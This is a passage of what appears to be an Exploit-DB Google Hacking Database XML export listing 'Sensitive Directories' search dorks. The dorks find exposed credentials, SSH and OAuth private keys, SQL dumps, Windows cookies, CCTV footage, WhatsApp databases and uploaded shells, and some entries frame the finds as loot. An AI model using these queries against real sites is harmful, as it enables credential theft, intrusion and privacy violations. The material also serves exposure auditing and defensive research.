https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/user&quot; | &quot;/users&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/user&quot; | &quot;/users&quot;</querystring>
<edb></edb>
<date>2019-02-15</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5123</id>
<link>https://www.exploit-db.com/ghdb/5123</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/Windows/Recent&quot; | &quot;/Windows/History/&quot;</shortDescription>
<textualDescription>This will give you the most recent used files and the history data.
This is for Vista - Windows 10, it will not work against XP or Windows 2003
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/Windows/Recent&quot; | &quot;/Windows/History/&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/Windows/Recent&quot; | &quot;/Windows/History/&quot;</querystring>
<edb></edb>
<date>2019-02-15</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>6141</id>
<link>https://www.exploit-db.com/ghdb/6141</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;admin/config&quot;</shortDescription>
<textualDescription>Dork:- intitle:&quot;index of&quot; &quot;admin/config&quot;
Description:-
This google dorks will find some Juicy Information about the admin-config
file.
Author:- Manish Kumar
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;admin/config&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;admin/config&quot;</querystring>
<edb></edb>
<date>2020-05-28</date>
<author>Manish Kumar</author>
</entry>
<entry>
<id>6002</id>
<link>https://www.exploit-db.com/ghdb/6002</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;admin/json&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;admin/json&quot;
Description: This Google dork lists out sensitive json file stored in the
admin folder for a website.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;admin/json&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;admin/json&quot;</querystring>
<edb></edb>
<date>2020-05-04</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6274</id>
<link>https://www.exploit-db.com/ghdb/6274</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;admin/sql/&quot;</shortDescription>
<textualDescription>Google Dork: intitle:&quot;index of&quot; &quot;admin/sql/&quot;
Impact: Sensitive Directories
Author: Rutwik Shah
LinkedIn: https://www.linkedin.com/in/rutwikshah/
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;admin/sql/&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;admin/sql/&quot;</querystring>
<edb></edb>
<date>2020-06-12</date>
<author>Rutwik Shah</author>
</entry>
<entry>
<id>5791</id>
<link>https://www.exploit-db.com/ghdb/5791</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;apache-log-parser&quot; &quot;Port 80&quot;</shortDescription>
<textualDescription>Google Dork Query to find out insecure Apache Log Parsers giving access to
Servers Logs running on Port 80.
Google Dork Query: *intitle:&quot;index of&quot; &quot;apache-log-parser&quot; &quot;Port 80&quot;*
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;apache-log-parser&quot; &quot;Port 80&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;apache-log-parser&quot; &quot;Port 80&quot;</querystring>
<edb></edb>
<date>2020-03-16</date>
<author>Rohit Gautam</author>
</entry>
<entry>
<id>6111</id>
<link>https://www.exploit-db.com/ghdb/6111</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;api/admin&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;api/admin&quot;
Description: This google dork lists out admin files for apis used on web
servers.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;api/admin&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;api/admin&quot;</querystring>
<edb></edb>
<date>2020-05-21</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6348</id>
<link>https://www.exploit-db.com/ghdb/6348</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;app.log&quot;</shortDescription>
<textualDescription># Dork : intitle:&quot;index of&quot; &quot;app.log&quot;
# Sensitive Informations
# Author : Ambadi MP
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;app.log&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;app.log&quot;</querystring>
<edb></edb>
<date>2020-06-30</date>
<author>Ambadi MP</author>
</entry>
<entry>
<id>5125</id>
<link>https://www.exploit-db.com/ghdb/5125</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;Application Data/Microsoft/Credentials&quot;</shortDescription>
<textualDescription>Credentials in Windows folder
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;Application Data/Microsoft/Credentials&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;Application Data/Microsoft/Credentials&quot;</querystring>
<edb></edb>
<date>2019-02-15</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5891</id>
<link>https://www.exploit-db.com/ghdb/5891</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;cctv&quot;</shortDescription>
<textualDescription>#Description: intitle:&quot;index of&quot; &quot;cctv&quot;
This Google dork shows CCTV video footages of other which are saved
insecurely on websites.
An attacker can further misuse this to conduct attacks.
#Author : Ketan Amrute
#Date: 4 April 2020
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;cctv&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;cctv&quot;</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Ketan Amrute</author>
</entry>
<entry>
<id>5926</id>
<link>https://www.exploit-db.com/ghdb/5926</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;common.crt&quot; OR &quot;ca.crt&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;common.crt&quot; OR &quot;ca.crt&quot;
# Configuration vpn files, certs, some keys, containing useful and juicy
information.
# Date: 20/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;common.crt&quot; OR &quot;ca.crt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;common.crt&quot; OR &quot;ca.crt&quot;</querystring>
<edb></edb>
<date>2020-04-20</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5782</id>
<link>https://www.exploit-db.com/ghdb/5782</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;config.py&quot;</shortDescription>
<textualDescription>The python configuration files can be found using the dork:
intitle:&quot;index of&quot; &quot;config.py&quot;
-Juveria Banu
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;config.py&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;config.py&quot;</querystring>
<edb></edb>
<date>2020-03-11</date>
<author>Juveria Banu</author>
</entry>
<entry>
<id>7129</id>
<link>https://www.exploit-db.com/ghdb/7129</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;contacts.vcf&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;contacts.vcf&quot;
# Sensitive Directories
# Date: 19/08/2021
# Exploit Author: Hilary Soita</textualDescription>
<query>intitle:&quot;index of&quot; &quot;contacts.vcf&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;contacts.vcf&quot;</querystring>
<edb></edb>
<date>2021-08-24</date>
<author>Hilary Soita</author>
</entry>
<entry>
<id>5162</id>
<link>https://www.exploit-db.com/ghdb/5162</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;db&quot;</shortDescription>
<textualDescription>Exploit : Access the sensitive directories using &quot;db&quot; file.
Google Dork : intitle:&quot;index of&quot; &quot;db&quot;
Exploit Author:- Jayson Zabate
URL :- https://invalidwebsecurity.info/
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;db&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;db&quot;</querystring>
<edb></edb>
<date>2019-03-25</date>
<author>Jayson Zabate</author>
</entry>
<entry>
<id>4057</id>
<link>https://www.exploit-db.com/ghdb/4057</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Index of&quot; &quot;DCIM&quot;</shortDescription>
<textualDescription>A lot of Camera Photos Dump.
Have Fun!.
Rootkit.</textualDescription>
<query>intitle:&quot;Index of&quot; &quot;DCIM&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; &quot;DCIM&quot;</querystring>
<edb></edb>
<date>2015-08-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>6698</id>
<link>https://www.exploit-db.com/ghdb/6698</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;dump.sql&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;dump.sql&quot;
# Sensitive directories that reveal total info about the database tables, users, passwords..etc
# Date: 20/11/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;dump.sql&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;dump.sql&quot;</querystring>
<edb></edb>
<date>2020-11-24</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6469</id>
<link>https://www.exploit-db.com/ghdb/6469</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;firewall.log&quot; | &quot;firewall.logs&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;firewall.log&quot; | &quot;firewall.logs&quot;
# Juicy info and sensitive directories.
# Date: 10/08/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;firewall.log&quot; | &quot;firewall.logs&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;firewall.log&quot; | &quot;firewall.logs&quot;</querystring>
<edb></edb>
<date>2020-08-10</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5716</id>
<link>https://www.exploit-db.com/ghdb/5716</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;ftp.log&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;ftp.log&quot;
Author: Pankaj Kumar Thakur (Nepal)
Linkedin: https://www.linkedin.com/in/pankaj1261/
Twitter: @Nep_1337_1998
Info:
It contains FTP LOGS
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;ftp.log&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;ftp.log&quot;</querystring>
<edb></edb>
<date>2020-01-28</date>
<author>Pankaj Kumar Thakur</author>
</entry>
<entry>
<id>5981</id>
<link>https://www.exploit-db.com/ghdb/5981</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;git-jira-log&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;git-jira-log&quot;
Description: This Google dork lists out sensitive git jira log files which
contain jira commits made via git for a website.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;git-jira-log&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;git-jira-log&quot;</querystring>
<edb></edb>
<date>2020-05-01</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>5930</id>
<link>https://www.exploit-db.com/ghdb/5930</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;global.asa&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;global.asa&quot;
# The global.asa configuration file is used by ASP.net applications to
store information and objects used by the application. Sometimes usernames,
passwords, and database credentials can be revealed.
# Date: 20/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;global.asa&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;global.asa&quot;</querystring>
<edb></edb>
<date>2020-04-20</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6017</id>
<link>https://www.exploit-db.com/ghdb/6017</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;graphql/subscription&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;graphql/subscription&quot;
Description: This Google dork lists out sensitive graphQL subscription
flows for a website.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;graphql/subscription&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;graphql/subscription&quot;</querystring>
<edb></edb>
<date>2020-05-05</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>5750</id>
<link>https://www.exploit-db.com/ghdb/5750</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;htdocs.zip&quot;</shortDescription>
<textualDescription>Find htdocs/website compressed backup.
--
*Hilary Soita.*
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;htdocs.zip&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;htdocs.zip&quot;</querystring>
<edb></edb>
<date>2020-02-21</date>
<author>Hilary Soita</author>
</entry>
<entry>
<id>5906</id>
<link>https://www.exploit-db.com/ghdb/5906</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;iredadmin/*&quot;</shortDescription>
<textualDescription>This dork found some useful information about the iredadmin mail
application.
Google Dork : intitle:&quot;index of&quot; &quot;iredadmin/*&quot;
Author : Berat ISLER (root1x)
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;iredadmin/*&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;iredadmin/*&quot;</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>berat isler</author>
</entry>
<entry>
<id>5799</id>
<link>https://www.exploit-db.com/ghdb/5799</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;jwt-auth&quot;</shortDescription>
<textualDescription>Google Dork Query to find out insecure and sensitve settings.yml metadata
stored in YML format.
Google Dork Query: *intitle:&quot;index of&quot; &quot;jwt-auth&quot;*
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;jwt-auth&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;jwt-auth&quot;</querystring>
<edb></edb>
<date>2020-03-17</date>
<author>Rohit Gautam</author>
</entry>
<entry>
<id>5792</id>
<link>https://www.exploit-db.com/ghdb/5792</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;maven-metadata.xml&quot; &quot;Port 80&quot;</shortDescription>
<textualDescription>Google Dork Query to find out insecure maven meta data stored in XML format
to identify the older versions which are also running on Port 80.
Google Dork Query: i*ntitle:&quot;index of&quot; &quot;maven-metadata.xml&quot; &quot;Port 80&quot;*
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;maven-metadata.xml&quot; &quot;Port 80&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;maven-metadata.xml&quot; &quot;Port 80&quot;</querystring>
<edb></edb>
<date>2020-03-16</date>
<author>Rohit Gautam</author>
</entry>
<entry>
<id>5788</id>
<link>https://www.exploit-db.com/ghdb/5788</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;metadata&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;metadata&quot;
# By using this dork, sensitive directories with juicy information can be
found.
# Date: 14/03/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;metadata&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;metadata&quot;</querystring>
<edb></edb>
<date>2020-03-16</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6304</id>
<link>https://www.exploit-db.com/ghdb/6304</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;oauth-private.key&quot;</shortDescription>
<textualDescription># Dork:intitle:&quot;index of&quot; &quot;oauth-private.key&quot;
# Oauth Private Keys
# Author: Ambadi MP
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;oauth-private.key&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;oauth-private.key&quot;</querystring>
<edb></edb>
<date>2020-06-17</date>
<author>Ambadi MP</author>
</entry>
<entry>
<id>4015</id>
<link>https://www.exploit-db.com/ghdb/4015</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;onetoc2&quot; &quot;one&quot;</shortDescription>
<textualDescription># Exploit Title: intitle:&quot;index of&quot; &quot;onetoc2&quot; &quot;one&quot;
# Google Dork: intitle:&quot;index of&quot; &quot;onetoc2&quot; &quot;one&quot;
# Date: 04/06/2015
# Exploit Author: Sphearis
# Vendor Homepage: NA
# Software Link: NA
# Version: NA
# Tested on: ALL
# CVE : NA
This dork allows you to see Onenote files stored in the open(*.one). These
files can be read easily with Onenote or a compatible viewer, no password,
no encryption.
The onetoc2 is added, it's a worthless file but is always inside a folder
containing one or several onenote files(and it obviously helps narrowing
the search to what we're looking for).</textualDescription>
<query>intitle:&quot;index of&quot; &quot;onetoc2&quot; &quot;one&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;onetoc2&quot; &quot;one&quot;</querystring>
<edb></edb>
<date>2015-06-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>5905</id>
<link>https://www.exploit-db.com/ghdb/5905</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;owncloud/config/*&quot;</shortDescription>
<textualDescription>This dork found owncloud config file. You can specify the search under the
&quot;owncloud&quot; path.
Google Dork : intitle:&quot;index of&quot; &quot;owncloud/config/*&quot;
Author : Berat ISLER(root1x)
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;owncloud/config/*&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;owncloud/config/*&quot;</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>berat isler</author>
</entry>
<entry>
<id>754</id>
<link>https://www.exploit-db.com/ghdb/754</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;parent directory&quot; &quot;desktop.ini&quot; site:dyndns.org</shortDescription>
<textualDescription>This search uses desktop.ini to track users with a webserver running on their desktop computers. It can easily be extended to find specific documents.</textualDescription>
<query>intitle:&quot;index of&quot; &quot;parent directory&quot; &quot;desktop.ini&quot; site:dyndns.org</query>
<querystring>https://www.google.com/search?q=intitle%3A%22index+of%22+%22parent+directory%22+%22desktop.ini%22+site%3Adyndns.org&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-12-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>7253</id>
<link>https://www.exploit-db.com/ghdb/7253</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;private/log&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;private/log&quot;
# Sensitive Directories
# Date: 08/07/2021
# Exploit Author: Rahul Kumar</textualDescription>
<query>intitle:&quot;index of&quot; &quot;private/log&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;private/log&quot;</querystring>
<edb></edb>
<date>2021-09-17</date>
<author>Rahul Kumar</author>
</entry>
<entry>
<id>5928</id>
<link>https://www.exploit-db.com/ghdb/5928</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;proxy.pac&quot; OR &quot;proxy.pac.bak&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;proxy.pac&quot; OR &quot;proxy.pac.bak&quot;
# Various proxy pac files containing juicy and sensitive information.
# Date: 20/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;proxy.pac&quot; OR &quot;proxy.pac.bak&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;proxy.pac&quot; OR &quot;proxy.pac.bak&quot;</querystring>
<edb></edb>
<date>2020-04-20</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6607</id>
<link>https://www.exploit-db.com/ghdb/6607</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;server.crt&quot; | &quot;server.csr&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;server.crt&quot; | &quot;server.csr&quot;
# Certificates and private keys...
# Date: 13/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;server.crt&quot; | &quot;server.csr&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;server.crt&quot; | &quot;server.csr&quot;</querystring>
<edb></edb>
<date>2020-10-13</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6593</id>
<link>https://www.exploit-db.com/ghdb/6593</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;slapd.conf&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;slapd.conf&quot;
# Sensitive directories containing passwords and more...
# Date: 5/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;slapd.conf&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;slapd.conf&quot;</querystring>
<edb></edb>
<date>2020-10-05</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5717</id>
<link>https://www.exploit-db.com/ghdb/5717</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;sms.log&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;sms.log&quot;
Author: Pankaj Kumar Thakur (Nepal)
Linkedin: https://www.linkedin.com/in/pankaj1261/
Twitter: @Nep_1337_1998
Info:
It contains SMS LOGS
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;sms.log&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;sms.log&quot;</querystring>
<edb></edb>
<date>2020-01-28</date>
<author>Pankaj Kumar Thakur</author>
</entry>
<entry>
<id>6327</id>
<link>https://www.exploit-db.com/ghdb/6327</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;ssh_host_ecdsa_key&quot;</shortDescription>
<textualDescription># Dork : intitle:&quot;index of&quot; &quot;ssh_host_ecdsa_key&quot;
# Sensitive Directory contains Private keys
# Author : Ambadi MP
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;ssh_host_ecdsa_key&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;ssh_host_ecdsa_key&quot;</querystring>
<edb></edb>
<date>2020-06-24</date>
<author>Ambadi MP</author>
</entry>
<entry>
<id>6262</id>
<link>https://www.exploit-db.com/ghdb/6262</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;survey.cgi&quot;</shortDescription>
<textualDescription>Author: Mohammed Arif H
Dork: intitle:&quot;index of&quot; &quot;survey.cgi&quot;
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;survey.cgi&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;survey.cgi&quot;</querystring>
<edb></edb>
<date>2020-06-10</date>
<author>Mohammed Arif H</author>
</entry>
<entry>
<id>6031</id>
<link>https://www.exploit-db.com/ghdb/6031</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;symfony/config&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;symfony/config&quot;
Description: This google dork lists out symfony configuration details for a
webserver.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;symfony/config&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;symfony/config&quot;</querystring>
<edb></edb>
<date>2020-05-06</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6142</id>
<link>https://www.exploit-db.com/ghdb/6142</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;system/config&quot;</shortDescription>
<textualDescription>Dork:- intitle:&quot;index of&quot; &quot;system/config&quot;
Description:-
This google dorks will find some Juicy Information about the system-config
file.
Author:- Manish Kumar
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;system/config&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;system/config&quot;</querystring>
<edb></edb>
<date>2020-05-28</date>
<author>Manish Kumar</author>
</entry>
<entry>
<id>6055</id>
<link>https://www.exploit-db.com/ghdb/6055</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;test/storage/framework/sessions/&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;test/storage/framework/sessions/&quot;
# Juicy information and sensitive directories, including tokens and more.
# Date: 6/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;test/storage/framework/sessions/&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;test/storage/framework/sessions/&quot;</querystring>
<edb></edb>
<date>2020-05-06</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6094</id>
<link>https://www.exploit-db.com/ghdb/6094</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;tinyfilemanager.php&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;tinyfilemanager.php&quot;
Description: This google dork lists out websites with the
&quot;tinyfilemanager.php&quot; shell uploaded on them and informs the attacker that
a remote shell upload is possible.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;tinyfilemanager.php&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;tinyfilemanager.php&quot;</querystring>
<edb></edb>
<date>2020-05-18</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6226</id>
<link>https://www.exploit-db.com/ghdb/6226</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;uploads.old&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;uploads.old&quot;
Description: This google dorks lists out sensitive files stored in old
upload folders on web servers.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;uploads.old&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;uploads.old&quot;</querystring>
<edb></edb>
<date>2020-06-05</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6648</id>
<link>https://www.exploit-db.com/ghdb/6648</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;WebServers.xml&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;WebServers.xml&quot;
# Sensitive directories.
# Date: 3/11/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;WebServers.xml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;WebServers.xml&quot;</querystring>
<edb></edb>
<date>2020-11-04</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4073</id>
<link>https://www.exploit-db.com/ghdb/4073</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Index of&quot; &quot;WhatsApp Databases&quot;</shortDescription>
<textualDescription>this dork find db.crypt/.db files of whatsapp conversations
you can open them with
https://code.google.com/p/hotoloti/downloads/detail?name=Whatsapp_Xtract_V2.1_2012-05-10-2.zip&amp;
thanks to pmbento
--acid_burn9X</textualDescription>
<query>intitle:&quot;Index of&quot; &quot;WhatsApp Databases&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; &quot;WhatsApp Databases&quot;</querystring>
<edb></edb>
<date>2015-09-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>4060</id>
<link>https://www.exploit-db.com/ghdb/4060</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Index of&quot; &quot;WhatsApp Images&quot;</shortDescription>
<textualDescription>WhatsApp Images folder, usually from backups.
--pmbento</textualDescription>
<query>intitle:&quot;Index of&quot; &quot;WhatsApp Images&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; &quot;WhatsApp Images&quot;</querystring>
<edb></edb>
<date>2015-08-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>5124</id>
<link>https://www.exploit-db.com/ghdb/5124</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;Windows\Cookies&quot;</shortDescription>
<textualDescription>Cookies from Windows users.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;WindowsCookies&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;Windows\Cookies&quot;</querystring>
<edb></edb>
<date>2019-02-15</date>
